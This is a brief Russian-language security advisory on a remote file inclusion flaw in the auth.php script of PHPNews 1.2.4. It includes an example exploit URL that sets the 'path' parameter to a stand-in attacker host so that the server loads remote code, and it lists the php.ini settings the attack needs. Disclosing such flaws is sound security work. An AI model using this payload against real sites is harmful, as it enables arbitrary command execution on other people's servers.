Программа: PHPNews 1.2.4
Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на уязвимой системе. Уязвимость
существует в сценарии 'auth.php' из-за
некорректной обработки входных данных в
некоторых переменных. Злоумышленник может
с помощью специально сформированного URL
выполнить произвольные команды на уязвимой
системе с привилегиями web сервера.
Пример:
http://[target]/[dir]/auth.php?path=http://[attacker]/
Для удачной эксплуатации уязвимости
register_globals и allow_url_fopen должны быть включены в
конфигурационном файле php.ini.
